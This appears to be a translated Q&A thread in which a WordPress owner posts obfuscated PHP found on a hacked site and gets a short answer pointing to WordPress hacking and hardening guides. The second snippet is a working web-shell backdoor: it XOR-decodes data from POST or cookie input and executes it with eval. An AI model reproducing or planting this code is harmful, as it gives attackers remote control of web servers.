Я нашел странные строки в исходных файлах моего сайта

Question

Я использую wordpress уже довольно много лет, но я никогда раньше не видел ничего подобного.

<?php 
function oepdbzyc($nshnmh, $af){$fnltbyd = ''; for($i=0; $i < strlen($nshnmh); $i++){$fnltbyd .= isset($af[$nshnmh[$i]]) ? $af[$nshnmh[$i]] : $nshnmh[$i];} 
$imtrpsh="base64_decode";return $imtrpsh($fnltbyd);} 
$zfilos = '0kXe3tsWB50fvJtQzwsQ5JFaBQz6YN8tUNpl4pld3E8l5TOXnRqGhksG5JtQzwsQzQz'. 

'9='; 
$loeupumf = Array('1'=>'4', '0'=>'Q', '3'=>'a', '2'=>'8', '5'=>'X', '4'=>'O', '7'=>'f', '6'=>'s', '9'=>'0', '8'=>'5', 'A'=>'k', 'C'=>'H', 'B'=>'Z', 'E'=>'W', 'D'=>'B', 'G'=>'n', 'F'=>'x', 'I'=>'j', 'H'=>'L', 'K'=>'r', 'J'=>'2', 'M'=>'1', 'L'=>'M', 'O'=>'N', 'N'=>'E', 'Q'=>'y', 'P'=>'h', 'S'=>'R', 'R'=>'C', 'U'=>'T', 'T'=>'3', 'W'=>'z', 'V'=>'F', 'Y'=>'I', 'X'=>'l', 'Z'=>'U', 'a'=>'v', 'c'=>'Y', 'b'=>'e', 'e'=>'u', 'd'=>'A', 'g'=>'6', 'f'=>'o', 'i'=>'q', 'h'=>'b', 'k'=>'G', 'j'=>'7', 'm'=>'K', 'l'=>'p', 'o'=>'i', 'n'=>'d', 'q'=>'g', 'p'=>'w', 's'=>'9', 'r'=>'P', 'u'=>'D', 't'=>'V', 'w'=>'m', 'v'=>'J', 'y'=>'t', 'x'=>'S', 'z'=>'c'); 
eval(oepdbzyc($zfilos, $loeupumf));?> 

$ zfilos - это более 1900 строк, поэтому я не могу опубликовать его здесь. Есть другие биты странных линий в случайных файлов, как этот:

<?php $GLOBALS['i82b56'] = "\x56\x61\x66\x59\x42\x5c\x75\x72\x46\x33\x57\x24\x31\x51\x47\x70\x69\x23\x3e\x5a\x4d\x34\x5f\x55\x37\x28\x60\x54\x50\x45\x40\x4b\x25\x26\x65\x2b\x5b\x4f\x3d\x4c\x4a\xa\x64\x53\x3f\x3c\x3a\x73\x27\x9\x76\x5e\x36\x74\x21\x52\x2a\x38\x77\x41\x43\x6e\x2d\x29\x7a\x71\x62\x7c\x6f\x39\x79\x30\x6b\x35\x22\x48\x6a\x78\x49\x20\x68\x6c\x67\x58\x4e\x2e\x3b\x44\x6d\xd\x2f\x2c\x5d\x7e\x7b\x63\x32\x7d"; 
$GLOBALS[$GLOBALS['i82b56'][72].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][21]] = $GLOBALS['i82b56'][95].$GLOBALS['i82b56'][80].$GLOBALS['i82b56'][7]; 
$GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73]] = $GLOBALS['i82b56'][68].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][42]; 
$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]] = $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][61]; 
$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]] = $GLOBALS['i82b56'][16].$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][53]; 
$GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][9]] = $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][34]; 
$GLOBALS[$GLOBALS['i82b56'][70].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][2]] = $GLOBALS['i82b56'][15].$GLOBALS['i82b56'][80].$GLOBALS['i82b56'][15].$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][61]; 
$GLOBALS[$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][73]] = $GLOBALS['i82b56'][6].$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][34]; 
$GLOBALS[$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][42]] = $GLOBALS['i82b56'][66].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][34]; 
$GLOBALS[$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][69]] = $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][53]; 
$GLOBALS[$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][69]] = $GLOBALS['i82b56'][76].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][73]; 
$GLOBALS[$GLOBALS['i82b56'][58].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][9]] = $GLOBALS['i82b56'][50].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][96]; 
$GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12]] = $_POST; 
$GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][9]] = $_COOKIE; 
@$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]]($GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][81].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][82], NULL); 
@$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]]($GLOBALS['i82b56'][81].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][82].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][47], 0); 
@$GLOBALS[$GLOBALS['i82b56'][65].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][71]]($GLOBALS['i82b56'][88].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][68].$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][22].$GLOBALS['i82b56'][53].$GLOBALS['i82b56'][16].$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][34], 0); 
@$GLOBALS[$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][69]](0); 

$w21270 = NULL; 
$a3259b2 = NULL; 

$GLOBALS[$GLOBALS['i82b56'][61].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][52]] = $GLOBALS['i82b56'][69].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][34].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][9]; 
global $n669656; 

function v89b2($w21270, $h174c8f) 
{ 
    $zbf0 = ""; 

    for ($p0dfb=0; $p0dfb<$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]]($w21270);) 
    { 
     for ($p5a3154=0; $p5a3154<$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]]($h174c8f) && $p0dfb<$GLOBALS[$GLOBALS['i82b56'][64].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][21].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][52].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][34]]($w21270); $p5a3154++, $p0dfb++) 
     { 
      $zbf0 .= $GLOBALS[$GLOBALS['i82b56'][72].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][21]]($GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73]]($w21270[$p0dfb])^$GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][73]]($h174c8f[$p5a3154])); 
     } 
    } 

    return $zbf0; 
} 

function j7c09b5($w21270, $h174c8f) 
{ 
    global $n669656; 

    return $GLOBALS[$GLOBALS['i82b56'][58].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][9]]($GLOBALS[$GLOBALS['i82b56'][58].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][9]]($w21270, $n669656), $h174c8f); 
} 

foreach ($GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][73].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][9]] as $h174c8f=>$t690f0) 
{ 
    $w21270 = $t690f0; 
    $a3259b2 = $h174c8f; 
} 

if (!$w21270) 
{ 
    foreach ($GLOBALS[$GLOBALS['i82b56'][6].$GLOBALS['i82b56'][69].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][12]] as $h174c8f=>$t690f0) 
    { 
     $w21270 = $t690f0; 
     $a3259b2 = $h174c8f; 
    } 
} 

$w21270 = @$GLOBALS[$GLOBALS['i82b56'][88].$GLOBALS['i82b56'][12].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][73]]($GLOBALS[$GLOBALS['i82b56'][77].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][24].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][69]]($GLOBALS[$GLOBALS['i82b56'][7].$GLOBALS['i82b56'][66].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][2].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][42]]($w21270), $a3259b2)); 
if (isset($w21270[$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][72]]) && $n669656==$w21270[$GLOBALS['i82b56'][1].$GLOBALS['i82b56'][72]]) 
{ 
    if ($w21270[$GLOBALS['i82b56'][1]] == $GLOBALS['i82b56'][16]) 
    { 
     $p0dfb = Array(
      $GLOBALS['i82b56'][15].$GLOBALS['i82b56'][50] => @$GLOBALS[$GLOBALS['i82b56'][70].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][2]](), 
      $GLOBALS['i82b56'][47].$GLOBALS['i82b56'][50] => $GLOBALS['i82b56'][12].$GLOBALS['i82b56'][85].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][62].$GLOBALS['i82b56'][12], 
     ); 
     echo @$GLOBALS[$GLOBALS['i82b56'][50].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][95].$GLOBALS['i82b56'][9].$GLOBALS['i82b56'][57].$GLOBALS['i82b56'][42].$GLOBALS['i82b56'][71].$GLOBALS['i82b56'][96].$GLOBALS['i82b56'][9]]($p0dfb); 
    } 
    elseif ($w21270[$GLOBALS['i82b56'][1]] == $GLOBALS['i82b56'][34]) 
    { 
     eval($w21270[$GLOBALS['i82b56'][42]]); 
    } 
    exit(); 
} 

Не говоря уже я борюсь с инъекцией SetTimeout, а также. Мой хостинг (который я использую примерно 5-6 лет) сказал мне сменить пароли, я удалил все учетные записи FTP, поэтому никто не может получить к нему доступ, и он по-прежнему появляется время от времени. Я предполагаю, что это только исходит от их конца.

Любые подсказки, что это и как остановить его? О, и я использую тему акций, никаких причудливых плагинов, ничего.

Answer 1

Вы были взломаны. Но взломанные вопросы сайта не соответствуют теме, потому что их индивидуальный характер трудно реплицировать и адресовать.

Тем не менее, внимательно следить за https://codex.wordpress.org/FAQ_My_site_was_hacked

Тогда обратите внимание на рекомендуемые меры безопасности в Hardening WordPress - WordPress Codex и Brute Force Attacks - WordPress Codex